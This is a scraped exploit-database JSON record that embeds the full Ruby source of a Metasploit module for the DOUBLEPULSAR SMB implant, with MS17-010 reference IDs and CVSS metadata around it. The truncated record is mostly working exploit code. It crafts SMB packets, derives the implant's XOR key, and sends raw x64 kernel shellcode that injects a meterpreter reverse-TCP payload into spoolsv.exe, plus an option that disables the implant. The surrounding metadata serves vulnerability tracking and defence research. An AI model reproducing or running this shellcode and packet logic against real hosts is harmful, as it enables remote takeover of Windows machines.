94, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-33895"]}, {"type": 
"rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "nessus", "idList": ["700099.PRM", "700059.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96709", "SMNTC-96703"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", 
"TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148", "MS:CVE-2017-0144"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-28T22:18:51", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-10-28T22:18:51", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This 
module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => 
{\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-29] #"}, "lastseen": "2021-10-28T22:18:51", "differentElements": ["sourceData"], "edition": 59}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "38dbaca43a74cd9829b2d2be866c90e7", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0146"], "immutableFields": [], "lastseen": "2021-10-29T22:21:24", "history": [], "viewCount": 94, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-27752"]}, {"type": 
"rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM", "700099.PRM"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-96707", "SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96705"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", 